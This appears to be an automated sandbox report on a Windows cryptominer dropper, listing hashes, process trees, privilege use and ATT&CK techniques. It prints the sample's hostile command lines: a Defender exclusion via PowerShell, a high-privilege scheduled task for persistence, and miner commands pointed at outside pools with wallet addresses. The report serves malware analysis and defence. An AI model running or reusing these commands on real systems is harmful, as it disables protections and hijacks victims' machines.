d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e

Analysis

max time kernel
300s
max time network
283s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
09/10/2022, 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e.exe
Size

2.2MB
MD5

5e1cf6f63e204bb56bd945f0588999cd
SHA1

8ceef2028db6d0bc142f1c44870b4c6488f1e9f7
SHA256

d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e
SHA512

54c09a0a04944826dc7df5dffa78f6cdcc0bc7e71cc92750c52fb014bd4aac8e0ec47d1f9bd74a957730a2ba917b0719f9d79dfa60841b54a751abc48c95806d
SSDEEP

12288:BnvL4W7oTE10oBQOAtW02JXmesVoGgcVylnsG8hIZBpi4bhJSs4dAgIGox660L:JswokmzlL4FJ/FL6

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
5056	kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe
3468	XAJRPYM.exe
1960	XAJRPYM.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2748	vbc.exe
2748	vbc.exe
2748	vbc.exe
2748	vbc.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3468 set thread context of 4844	3468	XAJRPYM.exe	80
PID 3468 set thread context of 2748	3468	XAJRPYM.exe	84

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4144	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3908	timeout.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5088	powershell.exe
5088	powershell.exe
5088	powershell.exe
1544	powershell.exe
1544	powershell.exe
1544	powershell.exe
3468	XAJRPYM.exe
3468	XAJRPYM.exe
3468	XAJRPYM.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	5056	kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeIncreaseQuotaPrivilege	5088	powershell.exe
Token: SeSecurityPrivilege	5088	powershell.exe
Token: SeTakeOwnershipPrivilege	5088	powershell.exe
Token: SeLoadDriverPrivilege	5088	powershell.exe
Token: SeSystemProfilePrivilege	5088	powershell.exe
Token: SeSystemtimePrivilege	5088	powershell.exe
Token: SeProfSingleProcessPrivilege	5088	powershell.exe
Token: SeIncBasePriorityPrivilege	5088	powershell.exe
Token: SeCreatePagefilePrivilege	5088	powershell.exe
Token: SeBackupPrivilege	5088	powershell.exe
Token: SeRestorePrivilege	5088	powershell.exe
Token: SeShutdownPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeSystemEnvironmentPrivilege	5088	powershell.exe
Token: SeRemoteShutdownPrivilege	5088	powershell.exe
Token: SeUndockPrivilege	5088	powershell.exe
Token: SeManageVolumePrivilege	5088	powershell.exe
Token: 33	5088	powershell.exe
Token: 34	5088	powershell.exe
Token: 35	5088	powershell.exe
Token: 36	5088	powershell.exe
Token: SeDebugPrivilege	3468	XAJRPYM.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeIncreaseQuotaPrivilege	1544	powershell.exe
Token: SeSecurityPrivilege	1544	powershell.exe
Token: SeTakeOwnershipPrivilege	1544	powershell.exe
Token: SeLoadDriverPrivilege	1544	powershell.exe
Token: SeSystemProfilePrivilege	1544	powershell.exe
Token: SeSystemtimePrivilege	1544	powershell.exe
Token: SeProfSingleProcessPrivilege	1544	powershell.exe
Token: SeIncBasePriorityPrivilege	1544	powershell.exe
Token: SeCreatePagefilePrivilege	1544	powershell.exe
Token: SeBackupPrivilege	1544	powershell.exe
Token: SeRestorePrivilege	1544	powershell.exe
Token: SeShutdownPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeSystemEnvironmentPrivilege	1544	powershell.exe
Token: SeRemoteShutdownPrivilege	1544	powershell.exe
Token: SeUndockPrivilege	1544	powershell.exe
Token: SeManageVolumePrivilege	1544	powershell.exe
Token: 33	1544	powershell.exe
Token: 34	1544	powershell.exe
Token: 35	1544	powershell.exe
Token: 36	1544	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 3828 wrote to memory of 5056	3828	d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e.exe	66
PID 3828 wrote to memory of 5056	3828	d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e.exe	66
PID 5056 wrote to memory of 5088	5056	kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe	67
PID 5056 wrote to memory of 5088	5056	kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe	67
PID 5056 wrote to memory of 4868	5056	kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe	69
PID 5056 wrote to memory of 4868	5056	kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe	69
PID 4868 wrote to memory of 3908	4868	cmd.exe	71
PID 4868 wrote to memory of 3908	4868	cmd.exe	71
PID 4868 wrote to memory of 3468	4868	cmd.exe	73
PID 4868 wrote to memory of 3468	4868	cmd.exe	73
PID 3468 wrote to memory of 1544	3468	XAJRPYM.exe	74
PID 3468 wrote to memory of 1544	3468	XAJRPYM.exe	74
PID 3468 wrote to memory of 4212	3468	XAJRPYM.exe	76
PID 3468 wrote to memory of 4212	3468	XAJRPYM.exe	76
PID 4212 wrote to memory of 4144	4212	cmd.exe	78
PID 4212 wrote to memory of 4144	4212	cmd.exe	78
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 3468 wrote to memory of 4844	3468	XAJRPYM.exe	80
PID 4844 wrote to memory of 5000	4844	vbc.exe	82
PID 4844 wrote to memory of 5000	4844	vbc.exe	82
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84
PID 3468 wrote to memory of 2748	3468	XAJRPYM.exe	84

C:\Users\Admin\AppData\Local\Temp\d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e.exe
"C:\Users\Admin\AppData\Local\Temp\d064b1b9e6fdb0d8db611366c7152b2cf77702eeafb7c206d191fc4b4e78821e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3828
- C:\Users\Admin\AppData\Roaming\kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe
  "C:\Users\Admin\AppData\Roaming\kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6D65.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3908
  - - C:\ProgramData\drivers\XAJRPYM.exe
      "C:\ProgramData\drivers\XAJRPYM.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1544
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XAJRPYM" /tr "C:\ProgramData\drivers\XAJRPYM.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4212
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XAJRPYM" /tr "C:\ProgramData\drivers\XAJRPYM.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:4144
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RQfYgmQ2CbdKUQx864hLZoF2ERjokkRWPt.work -p x -t 5
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:5000
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a kawpow -o stratum+tcp://stratum-ravencoin.flypool.org:13333 -u REp55FkStCWpJztjqUAm3ssDyxmimpEZrm.workrvn
        5⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2748

C:\ProgramData\drivers\XAJRPYM.exe
C:\ProgramData\drivers\XAJRPYM.exe
1⤵
- Executes dropped EXE
PID:1960

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\drivers\XAJRPYM.exe

Filesize
836KB

MD5
725748aafdd97a2dad9477ed2930dd5d

SHA1
610f046c8858e32cbd1437e684c34556d59d5367

SHA256
c772cc886ca47030f2861a1e6b0f41beab6d56ba95e30eec1902c1f1c20fa513

SHA512
f78d132047d853df509e00d6614e2ae6f4e71dd5e6237502799ce10f1a0b0a7fe460ec71137a49d8fc3e937e4af49e64005048aab9f39a321acc5facf119ed04

Download Submit
C:\ProgramData\drivers\XAJRPYM.exe

Filesize
836KB

MD5
725748aafdd97a2dad9477ed2930dd5d

SHA1
610f046c8858e32cbd1437e684c34556d59d5367

SHA256
c772cc886ca47030f2861a1e6b0f41beab6d56ba95e30eec1902c1f1c20fa513

SHA512
f78d132047d853df509e00d6614e2ae6f4e71dd5e6237502799ce10f1a0b0a7fe460ec71137a49d8fc3e937e4af49e64005048aab9f39a321acc5facf119ed04

Download Submit
C:\ProgramData\drivers\XAJRPYM.exe

Filesize
836KB

MD5
725748aafdd97a2dad9477ed2930dd5d

SHA1
610f046c8858e32cbd1437e684c34556d59d5367

SHA256
c772cc886ca47030f2861a1e6b0f41beab6d56ba95e30eec1902c1f1c20fa513

SHA512
f78d132047d853df509e00d6614e2ae6f4e71dd5e6237502799ce10f1a0b0a7fe460ec71137a49d8fc3e937e4af49e64005048aab9f39a321acc5facf119ed04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d0ecaf9e8281b235448a0805dbd44026

SHA1
feb9bb2c4f5c889d426b37230ad62c82ff2c3d2b

SHA256
4d1e2b188e575079b675186916d33f7ad32de0cf01c91d3de4b2256d28fcffb7

SHA512
1a74d98cf293a488ae6c5013ba0965b78618b663d5179e3e6a54a0c0834312afb349bae7c5702c957a3041f8506c0c4fa0037e28c35f9e414cdff5d5fb18e0d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6D65.tmp.bat

Filesize
143B

MD5
ae8f68beaecf831d71907036693e7ec7

SHA1
9ae0241a0ddcd9d8f497e043134c9673b6cf4575

SHA256
0c4ebfb7efecaa45c367112971e2d433af9db31bc4dfd3553f99636465eca758

SHA512
bd4fb4d2b681d4e3875810058b8a56fcaab3a21ca243bd75316780309fd28e0cd4d2c602bb3fd846b3c4aadf7eb2be1b1e357e24dc95d29a1b779f53fa7d61b2

Download Submit
C:\Users\Admin\AppData\Roaming\kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe

Filesize
836KB

MD5
725748aafdd97a2dad9477ed2930dd5d

SHA1
610f046c8858e32cbd1437e684c34556d59d5367

SHA256
c772cc886ca47030f2861a1e6b0f41beab6d56ba95e30eec1902c1f1c20fa513

SHA512
f78d132047d853df509e00d6614e2ae6f4e71dd5e6237502799ce10f1a0b0a7fe460ec71137a49d8fc3e937e4af49e64005048aab9f39a321acc5facf119ed04

Download Submit
C:\Users\Admin\AppData\Roaming\kuBKCfShhSACfhkFChKHhSSCssSaCUKABeuUSChHsHfFhuFeHaESFAe.exe

Filesize
836KB

MD5
725748aafdd97a2dad9477ed2930dd5d

SHA1
610f046c8858e32cbd1437e684c34556d59d5367

SHA256
c772cc886ca47030f2861a1e6b0f41beab6d56ba95e30eec1902c1f1c20fa513

SHA512
f78d132047d853df509e00d6614e2ae6f4e71dd5e6237502799ce10f1a0b0a7fe460ec71137a49d8fc3e937e4af49e64005048aab9f39a321acc5facf119ed04

Download Submit
memory/2748-217-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/2748-214-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/3828-116-0x0000000000560000-0x0000000000796000-memory.dmp

Filesize
2.2MB

Download
memory/4844-209-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4844-207-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4844-210-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4844-212-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4844-213-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/5056-120-0x0000000000EC0000-0x0000000000F96000-memory.dmp

Filesize
856KB

Download
memory/5088-135-0x000002019A910000-0x000002019A986000-memory.dmp

Filesize
472KB

Download
memory/5088-130-0x0000020198610000-0x0000020198632000-memory.dmp

Filesize
136KB

Download